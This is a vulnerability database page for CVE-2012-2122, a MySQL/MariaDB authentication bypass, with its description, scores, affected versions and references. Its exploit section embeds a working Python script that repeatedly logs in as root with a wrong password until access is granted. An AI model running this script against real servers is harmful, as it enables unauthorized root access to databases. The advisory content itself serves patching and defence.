CVE-2012-2122 Detail

CVE-2012-2122

CVE Descriptions

sql/password.c in Oracle MySQL 5.1.x before 5.1.63, 5.5.x before 5.5.24, and 5.6.x before 5.6.6, and MariaDB 5.1.x before 5.1.62, 5.2.x before 5.2.12, 5.3.x before 5.3.6, and 5.5.x before 5.5.23, when running in certain environments with certain implementations of the memcmp function, allows remote attackers to bypass authentication by repeatedly authenticating with the same incorrect password, which eventually causes a token comparison to succeed due to an improperly-checked return value.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-287	Improper Authentication When an actor claims to have a given identity, the product does not prove or insufficiently proves that the claim is correct.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	5.1		AV:N/AC:H/Au:N/C:P/I:P/A:P	[email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 19092

Publication date : 2012-06-11 22h00 +00:00
Author : David Kennedy (ReL1K)
EDB Verified : Yes

#!/usr/bin/python # # # This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little. # # Title: MySQL Remote Root Authentication Bypass # Written by: Dave Kennedy (ReL1K) # http://www.secmaniac.com # # Original advisory here: seclists.org/oss-sec/2012/q2/493 import subprocess ipaddr = raw_input("Enter the IP address of the mysql server: ") while 1: subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait()

Products Mentioned

Configuraton 0

Oracle>>Mysql >> Version 5.1.51

Oracle>>Mysql >> Version 5.1.51 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.52

Oracle>>Mysql >> Version 5.1.52 (Open CPE detail)
Oracle>>Mysql >> Version 5.1.52 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.52

Oracle>>Mysql >> Version 5.1.52 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.53

Oracle>>Mysql >> Version 5.1.53 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.54

Oracle>>Mysql >> Version 5.1.54 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.55

Oracle>>Mysql >> Version 5.1.55 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.56

Oracle>>Mysql >> Version 5.1.56 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.57

Oracle>>Mysql >> Version 5.1.57 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.58

Oracle>>Mysql >> Version 5.1.58 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.59

Oracle>>Mysql >> Version 5.1.59 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.60

Oracle>>Mysql >> Version 5.1.60 (Open CPE detail)

Oracle>>Mysql >> Version 5.1.61

Oracle>>Mysql >> Version 5.1.61 (Open CPE detail)

Configuraton 0

Oracle>>Mysql >> Version 5.5.10

Oracle>>Mysql >> Version 5.5.10 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.11

Oracle>>Mysql >> Version 5.5.11 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.12

Oracle>>Mysql >> Version 5.5.12 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.13

Oracle>>Mysql >> Version 5.5.13 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.14

Oracle>>Mysql >> Version 5.5.14 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.15

Oracle>>Mysql >> Version 5.5.15 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.16

Oracle>>Mysql >> Version 5.5.16 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.17

Oracle>>Mysql >> Version 5.5.17 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.18

Oracle>>Mysql >> Version 5.5.18 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.19

Oracle>>Mysql >> Version 5.5.19 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.20

Oracle>>Mysql >> Version 5.5.20 (Open CPE detail)

Oracle>>Mysql >> Version 5.5.21

Oracle>>Mysql >> Version 5.5.21 (Open CPE detail)

Configuraton 0

Oracle>>Mysql >> Version 5.6.2

Oracle>>Mysql >> Version 5.6.2 (Open CPE detail)

Oracle>>Mysql >> Version 5.6.3

Oracle>>Mysql >> Version 5.6.3 (Open CPE detail)

Oracle>>Mysql >> Version 5.6.4

Oracle>>Mysql >> Version 5.6.4 (Open CPE detail)

Oracle>>Mysql >> Version 5.6.5

Oracle>>Mysql >> Version 5.6.5 (Open CPE detail)

Configuraton 0

Mariadb>>Mariadb >> Version 5.1.41

Mariadb>>Mariadb >> Version 5.1.41 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.1.42

Mariadb>>Mariadb >> Version 5.1.42 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.1.44

Mariadb>>Mariadb >> Version 5.1.44 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.1.47

Mariadb>>Mariadb >> Version 5.1.47 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.1.49

Mariadb>>Mariadb >> Version 5.1.49 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.1.50

Mariadb>>Mariadb >> Version 5.1.50 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.1.51

Mariadb>>Mariadb >> Version 5.1.51 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.1.53

Mariadb>>Mariadb >> Version 5.1.53 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.1.55

Mariadb>>Mariadb >> Version 5.1.55 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.1.60

Mariadb>>Mariadb >> Version 5.1.60 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.1.61

Mariadb>>Mariadb >> Version 5.1.61 (Open CPE detail)

Configuraton 0

Mariadb>>Mariadb >> Version 5.2.0

Mariadb>>Mariadb >> Version 5.2.0 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.1

Mariadb>>Mariadb >> Version 5.2.1 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.2

Mariadb>>Mariadb >> Version 5.2.2 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.3

Mariadb>>Mariadb >> Version 5.2.3 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.4

Mariadb>>Mariadb >> Version 5.2.4 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.5

Mariadb>>Mariadb >> Version 5.2.5 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.6

Mariadb>>Mariadb >> Version 5.2.6 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.7

Mariadb>>Mariadb >> Version 5.2.7 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.8

Mariadb>>Mariadb >> Version 5.2.8 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.9

Mariadb>>Mariadb >> Version 5.2.9 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.10

Mariadb>>Mariadb >> Version 5.2.10 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.2.11

Mariadb>>Mariadb >> Version 5.2.11 (Open CPE detail)

Configuraton 0

Mariadb>>Mariadb >> Version 5.3.0

Mariadb>>Mariadb >> Version 5.3.0 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.3.1

Mariadb>>Mariadb >> Version 5.3.1 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.3.2

Mariadb>>Mariadb >> Version 5.3.2 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.3.3

Mariadb>>Mariadb >> Version 5.3.3 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.3.4

Mariadb>>Mariadb >> Version 5.3.4 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.3.5

Mariadb>>Mariadb >> Version 5.3.5 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.3.6

Mariadb>>Mariadb >> Version 5.3.6 (Open CPE detail)

Configuraton 0

Mariadb>>Mariadb >> Version 5.5.20

Mariadb>>Mariadb >> Version 5.5.20 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.5.21

Mariadb>>Mariadb >> Version 5.5.21 (Open CPE detail)

Mariadb>>Mariadb >> Version 5.5.22

Mariadb>>Mariadb >> Version 5.5.22 (Open CPE detail)

References

http://bugs.mysql.com/bug.php?id=64884
Tags : x_refsource_MISC

http://www.securityfocus.com/bid/53911
Tags : vdb-entry, x_refsource_BID

http://www.exploit-db.com/exploits/19092
Tags : exploit, x_refsource_EXPLOIT-DB

http://secunia.com/advisories/53372
Tags : third-party-advisory, x_refsource_SECUNIA

http://security.gentoo.org/glsa/glsa-201308-06.xml
Tags : vendor-advisory, x_refsource_GENTOO

http://lists.opensuse.org/opensuse-security-announce/2012-08/msg00007.html
Tags : vendor-advisory, x_refsource_SUSE

https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
Tags : x_refsource_MISC

http://securitytracker.com/id?1027143
Tags : vdb-entry, x_refsource_SECTRACK

http://secunia.com/advisories/49417
Tags : third-party-advisory, x_refsource_SECUNIA

http://seclists.org/oss-sec/2012/q2/493
Tags : mailing-list, x_refsource_MLIST

http://kb.askmonty.org/en/mariadb-5162-release-notes/
Tags : x_refsource_CONFIRM

CVE-2012-2122 : Detail

CVE-2012-2122

CVE Descriptions

CVE Informations

Related Weaknesses

Metrics

EPSS

EPSS Score

EPSS Percentile

Exploit information

Exploit Database EDB-ID : 19092

Products Mentioned

Configuraton 0

Configuraton 0

Configuraton 0

Configuraton 0

Configuraton 0

Configuraton 0

Configuraton 0

References